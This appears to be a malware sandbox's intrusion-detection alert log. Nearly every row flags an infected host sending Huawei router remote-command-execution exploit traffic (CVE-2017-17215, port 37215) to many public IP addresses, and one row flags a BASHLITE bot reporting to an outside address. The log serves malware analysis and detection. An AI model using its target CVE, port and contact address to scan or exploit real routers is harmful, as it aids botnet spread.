                                            06/14/24-10:43:48.020030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4453837215192.168.2.14156.204.202.2
                                            06/14/24-10:44:12.643278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5890037215192.168.2.1441.14.252.187
                                            06/14/24-10:43:54.185013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4468837215192.168.2.14156.100.140.144
                                            06/14/24-10:44:26.986110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4161837215192.168.2.14156.19.2.132
                                            06/14/24-10:44:29.022498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3751237215192.168.2.14197.36.14.153
                                            06/14/24-10:44:18.778107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5063837215192.168.2.14156.71.188.115
                                            06/14/24-10:43:56.244551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769037215192.168.2.1441.41.104.151
                                            06/14/24-10:44:00.321459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4760037215192.168.2.1441.195.118.219
                                            06/14/24-10:43:54.183933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4266837215192.168.2.14156.2.187.67
                                            06/14/24-10:43:36.703310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582437215192.168.2.14156.117.76.121
                                            06/14/24-10:43:39.792539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3462237215192.168.2.1441.88.88.75
                                            06/14/24-10:44:08.502405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4179237215192.168.2.14197.43.29.24
                                            06/14/24-10:43:45.984569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705637215192.168.2.1441.96.85.88
                                            06/14/24-10:43:58.276286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3979437215192.168.2.14197.246.27.4
                                            06/14/24-10:44:04.407392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056237215192.168.2.14156.33.225.51
                                            06/14/24-10:43:56.243084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4346837215192.168.2.14156.249.23.109
                                            06/14/24-10:43:58.289734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4687037215192.168.2.1441.188.95.61
                                            06/14/24-10:43:50.073936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5560437215192.168.2.1441.165.81.143
                                            06/14/24-10:43:52.165396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3879237215192.168.2.14197.97.109.175
                                            06/14/24-10:44:14.669746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4344437215192.168.2.1441.218.9.86
                                            06/14/24-10:43:34.662864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3676037215192.168.2.14156.184.162.68
                                            06/14/24-10:44:04.409838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3450837215192.168.2.1441.225.202.63
                                            06/14/24-10:44:10.568701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3900837215192.168.2.1441.201.207.200
                                            06/14/24-10:44:06.451785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4355237215192.168.2.14156.104.223.208
                                            06/14/24-10:43:52.149403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5668437215192.168.2.14197.227.47.110
                                            06/14/24-10:44:18.776531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6029837215192.168.2.1441.80.174.39
                                            06/14/24-10:43:54.200556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671837215192.168.2.1441.134.147.101
                                            06/14/24-10:43:54.186016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4941437215192.168.2.14156.161.252.74
                                            06/14/24-10:43:36.704824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4464637215192.168.2.1441.86.162.204
                                            06/14/24-10:43:34.675865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4725837215192.168.2.14156.53.22.9
                                            06/14/24-10:43:41.848595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5124037215192.168.2.14197.211.172.30
                                            06/14/24-10:44:24.917040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660637215192.168.2.14197.75.53.109
                                            06/14/24-10:43:37.772359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026837215192.168.2.14156.235.168.70
                                            06/14/24-10:43:50.071076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4774837215192.168.2.14156.163.143.242
                                            06/14/24-10:43:56.225677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838637215192.168.2.14197.186.202.59
                                            06/14/24-10:44:22.857803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5217637215192.168.2.14197.131.102.5
                                            06/14/24-10:44:31.082305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731237215192.168.2.1441.231.78.123
                                            06/14/24-10:43:45.966863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4164837215192.168.2.14156.15.139.71
                                            06/14/24-10:44:31.093021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5621037215192.168.2.14156.24.91.249
                                            06/14/24-10:44:22.858759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5119637215192.168.2.14197.57.43.231
                                            06/14/24-10:44:12.643769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4154037215192.168.2.14156.229.6.154
                                            06/14/24-10:43:58.275359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4849637215192.168.2.14156.99.228.141
                                            06/14/24-10:43:58.276908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610437215192.168.2.14156.174.102.212
                                            06/14/24-10:44:27.001384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062637215192.168.2.14197.96.147.244
                                            06/14/24-10:43:41.905174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450037215192.168.2.14156.56.159.140
                                            06/14/24-10:43:39.789424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4242237215192.168.2.14197.178.220.16
                                            06/14/24-10:43:39.810475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5013637215192.168.2.14156.192.107.114
                                            06/14/24-10:44:16.733627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5785237215192.168.2.1441.208.32.196
                                            06/14/24-10:44:04.420710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3916637215192.168.2.14197.111.236.85
                                            06/14/24-10:44:04.422878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4249637215192.168.2.1441.99.96.57
                                            06/14/24-10:44:27.002049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3864837215192.168.2.14197.99.133.171
                                            06/14/24-10:44:04.411116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5555837215192.168.2.1441.100.77.179
                                            06/14/24-10:44:22.882346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5383637215192.168.2.14197.146.147.242
                                            06/14/24-10:44:24.915454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5730037215192.168.2.1441.118.240.87
                                            06/14/24-10:43:54.185262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5772437215192.168.2.1441.37.218.156
                                            06/14/24-10:43:41.850672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786837215192.168.2.1441.134.99.108
                                            06/14/24-10:43:48.020343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4005237215192.168.2.1441.185.64.228
                                            06/14/24-10:44:26.979856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501637215192.168.2.14197.216.129.105
                                            06/14/24-10:43:54.199757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5721037215192.168.2.14197.29.121.180
                                            06/14/24-10:43:56.253562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4408837215192.168.2.14197.206.114.167
                                            06/14/24-10:44:22.878341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6006637215192.168.2.1441.86.193.99
                                            06/14/24-10:43:50.069499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4313837215192.168.2.1441.211.247.104
                                            06/14/24-10:43:50.071846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5371237215192.168.2.1441.113.77.50
                                            06/14/24-10:43:36.724799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844037215192.168.2.14156.135.33.111
                                            06/14/24-10:44:08.518828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4523837215192.168.2.1441.23.193.34
                                            06/14/24-10:44:14.666494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922037215192.168.2.14197.22.48.178
                                            06/14/24-10:43:39.813531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5552837215192.168.2.14156.137.254.152
                                            06/14/24-10:44:10.563271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4570437215192.168.2.14197.59.233.158
                                            06/14/24-10:43:58.275018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5662837215192.168.2.14197.71.91.73
                                            06/14/24-10:44:14.670088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968637215192.168.2.14197.137.144.54
                                            06/14/24-10:43:45.968387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4009037215192.168.2.14156.172.161.71
                                            06/14/24-10:43:45.989327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291237215192.168.2.1441.191.125.119
                                            06/14/24-10:44:12.618753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3876637215192.168.2.14156.108.113.52
                                            06/14/24-10:43:54.182848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133237215192.168.2.14156.119.170.236
                                            06/14/24-10:43:45.989679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770837215192.168.2.14197.100.163.88
                                            06/14/24-10:43:48.019508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5433037215192.168.2.14156.114.58.230
                                            06/14/24-10:44:26.979403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912437215192.168.2.14156.97.242.252
                                            06/14/24-10:44:26.985769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3310437215192.168.2.1441.112.53.101
                                            06/14/24-10:43:39.808433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429437215192.168.2.14156.176.116.187
                                            06/14/24-10:43:45.965913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4295837215192.168.2.14156.234.154.93
                                            06/14/24-10:43:37.763305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448437215192.168.2.14197.175.209.107
                                            06/14/24-10:43:58.274647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4697237215192.168.2.1441.217.148.41
                                            06/14/24-10:43:56.243488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3347037215192.168.2.14156.64.85.204
                                            06/14/24-10:44:27.000161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909237215192.168.2.14156.132.226.156
                                            06/14/24-10:44:00.338412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3450437215192.168.2.14197.32.157.124
                                            06/14/24-10:44:04.411239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422237215192.168.2.1441.19.141.34
                                            06/14/24-10:43:36.704524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3460237215192.168.2.14156.206.126.195
                                            06/14/24-10:43:48.021785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890037215192.168.2.1441.28.229.88
                                            06/14/24-10:44:00.340097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942237215192.168.2.14156.136.189.29
                                            06/14/24-10:44:20.807437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922237215192.168.2.14156.168.39.131
                                            06/14/24-10:44:08.504853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805237215192.168.2.14197.14.119.125
                                            06/14/24-10:43:45.969732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5422237215192.168.2.14156.86.161.9
                                            06/14/24-10:44:22.879295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5954637215192.168.2.14197.155.108.21
                                            06/14/24-10:43:58.275123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806437215192.168.2.14156.150.136.177
                                            06/14/24-10:43:36.726031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562037215192.168.2.14156.231.239.109
                                            06/14/24-10:43:41.847979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745037215192.168.2.14156.174.243.7
                                            06/14/24-10:44:04.423356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3508637215192.168.2.1441.179.245.66
                                            06/14/24-10:44:20.827973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5717637215192.168.2.14156.215.0.164
                                            06/14/24-10:43:50.075114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5633237215192.168.2.1441.151.183.207
                                            06/14/24-10:43:34.661885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917637215192.168.2.14156.75.157.213
                                            06/14/24-10:43:45.967482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3523837215192.168.2.14197.17.186.7
                                            06/14/24-10:44:35.182968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5274437215192.168.2.14197.187.203.220
                                            06/14/24-10:44:33.151068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980237215192.168.2.1441.122.143.235
                                            06/14/24-10:43:48.031915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5836037215192.168.2.1441.137.238.77
                                            06/14/24-10:43:34.678917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5687637215192.168.2.1441.237.145.22
                                            06/14/24-10:43:52.143380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527637215192.168.2.14197.104.230.253
                                            06/14/24-10:43:52.164008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5006637215192.168.2.14156.114.62.203
                                            06/14/24-10:44:18.760963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5304237215192.168.2.14156.21.36.8
                                            06/14/24-10:44:14.672398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4252837215192.168.2.14156.141.25.45
                                            06/14/24-10:43:41.846759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727837215192.168.2.14197.55.73.26
                                            06/14/24-10:44:31.123479TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)4796423192.168.2.1443.231.232.101
                                            06/14/24-10:43:45.991209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4336637215192.168.2.14197.146.191.91
                                            06/14/24-10:43:54.186090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4558037215192.168.2.14197.135.179.153
                                            06/14/24-10:44:26.980080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3464037215192.168.2.14197.229.133.226
                                            06/14/24-10:44:12.618059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5366837215192.168.2.1441.188.114.222
                                            06/14/24-10:44:33.135172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3662637215192.168.2.14197.248.63.183
                                            06/14/24-10:44:04.408150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5516237215192.168.2.14156.73.202.13
                                            06/14/24-10:44:29.014527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5524837215192.168.2.1441.19.237.243
                                            06/14/24-10:43:36.722132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3451637215192.168.2.1441.130.45.29
                                            06/14/24-10:44:06.453930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3838037215192.168.2.14197.187.36.6
                                            06/14/24-10:43:45.967516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063037215192.168.2.14197.71.197.103
                                            06/14/24-10:43:58.295004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3462837215192.168.2.1441.236.252.187
                                            06/14/24-10:44:22.860557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4775637215192.168.2.1441.42.165.213
                                            06/14/24-10:44:24.916392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5920437215192.168.2.1441.219.11.238
                                            06/14/24-10:44:00.337828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4186437215192.168.2.14197.159.198.68
                                            06/14/24-10:43:36.700089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359837215192.168.2.14156.248.26.132
                                            06/14/24-10:44:29.012090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4381237215192.168.2.14156.24.126.252
                                            06/14/24-10:43:50.075242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6068237215192.168.2.14197.159.109.56
                                            06/14/24-10:44:27.001273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4696037215192.168.2.1441.251.133.26
                                            06/14/24-10:44:22.879182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5660837215192.168.2.1441.14.222.249
                                            06/14/24-10:44:02.383378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4422437215192.168.2.14197.174.169.35
                                            06/14/24-10:44:08.502102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4449837215192.168.2.14197.238.42.236
                                            06/14/24-10:43:41.906472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674837215192.168.2.14156.56.142.46
                                            06/14/24-10:43:48.021029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4552637215192.168.2.14156.133.44.74
                                            06/14/24-10:44:04.408370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434837215192.168.2.1441.251.149.29
                                            06/14/24-10:44:04.411044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4985637215192.168.2.1441.68.179.241
                                            06/14/24-10:44:08.504379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999037215192.168.2.14156.116.6.111
                                            06/14/24-10:44:04.407515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775637215192.168.2.14197.98.234.184
                                            06/14/24-10:43:56.227592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3404437215192.168.2.14197.222.111.42
                                            06/14/24-10:44:20.829432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3738037215192.168.2.14197.5.34.124
                                            06/14/24-10:44:18.760999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5065837215192.168.2.14156.227.163.148
                                            06/14/24-10:43:45.966127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867837215192.168.2.14197.231.60.18
                                            06/14/24-10:43:56.225348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4132837215192.168.2.14197.43.86.252
                                            06/14/24-10:44:20.831312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4898237215192.168.2.14156.169.186.34
                                            06/14/24-10:43:45.985305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602837215192.168.2.14197.10.122.243
                                            06/14/24-10:44:27.000189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6046837215192.168.2.14197.123.55.129
                                            06/14/24-10:44:04.410980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5905237215192.168.2.14156.252.115.194
                                            06/14/24-10:44:10.542708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5129037215192.168.2.14156.16.132.2
                                            06/14/24-10:43:50.070683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4719437215192.168.2.14156.216.245.7
                                            06/14/24-10:43:48.032401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3875437215192.168.2.1441.229.117.23
                                            06/14/24-10:44:08.520321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5147837215192.168.2.14197.69.128.245
                                            06/14/24-10:44:24.944276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055037215192.168.2.1441.201.83.157
                                            06/14/24-10:44:22.881391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6016837215192.168.2.1441.144.163.148
                                            06/14/24-10:44:35.180722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286037215192.168.2.1441.77.74.200
                                            06/14/24-10:43:56.245984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819037215192.168.2.14197.156.229.79
                                            06/14/24-10:44:26.980725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630837215192.168.2.14156.45.171.151
                                            06/14/24-10:44:24.944731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4263837215192.168.2.14197.239.204.169
                                            06/14/24-10:43:45.967310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3812237215192.168.2.14197.217.233.133
                                            06/14/24-10:44:18.774954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3322037215192.168.2.14197.34.19.80
                                            06/14/24-10:43:54.183506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5589237215192.168.2.14197.148.12.222
                                            06/14/24-10:44:29.010392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4313837215192.168.2.14197.178.131.163
                                            06/14/24-10:44:31.051814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157237215192.168.2.14156.218.30.134
                                            06/14/24-10:44:04.421174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912237215192.168.2.1441.186.254.91
                                            06/14/24-10:43:43.942282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695237215192.168.2.14197.106.166.42
                                            06/14/24-10:43:37.772428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4155437215192.168.2.1441.166.30.213
                                            06/14/24-10:44:02.364549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5278237215192.168.2.14156.51.83.129
                                            06/14/24-10:43:36.727456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5607437215192.168.2.14197.120.234.106
                                            06/14/24-10:44:31.092319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187237215192.168.2.14197.254.196.95
                                            06/14/24-10:44:02.368414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4799037215192.168.2.14156.114.230.108
                                            06/14/24-10:43:39.811871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027637215192.168.2.14156.149.204.29
                                            06/14/24-10:44:29.014982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5040437215192.168.2.14197.26.85.118
                                            06/14/24-10:44:14.683713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482637215192.168.2.14156.63.93.89
                                            06/14/24-10:44:10.547197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3927037215192.168.2.1441.238.45.145
                                            06/14/24-10:43:34.660644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4495037215192.168.2.1441.203.38.182
                                            06/14/24-10:44:10.567265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3642837215192.168.2.14197.223.175.23
                                            06/14/24-10:44:26.976856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299637215192.168.2.14156.80.117.70
                                            06/14/24-10:44:29.024249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4875437215192.168.2.14197.198.217.156
                                            06/14/24-10:44:29.024676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6028837215192.168.2.14156.49.191.111
                                            06/14/24-10:44:14.684621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3803637215192.168.2.14156.49.246.201
                                            06/14/24-10:43:45.967181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4476837215192.168.2.14197.226.72.76
                                            06/14/24-10:44:35.181349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6080637215192.168.2.14197.35.251.69
                                            06/14/24-10:44:12.646579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4429037215192.168.2.1441.101.107.149
                                            06/14/24-10:43:41.849420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3368637215192.168.2.14156.200.186.99
                                            06/14/24-10:43:56.253528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399037215192.168.2.14156.82.185.196
                                            06/14/24-10:43:43.944551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4717237215192.168.2.14156.202.13.234
                                            06/14/24-10:44:29.027813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5214837215192.168.2.1441.84.168.240
                                            06/14/24-10:44:29.027300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4192437215192.168.2.1441.93.11.137
                                            06/14/24-10:43:54.202708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562437215192.168.2.1441.129.30.138
                                            06/14/24-10:43:41.847917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4219237215192.168.2.14156.78.200.17
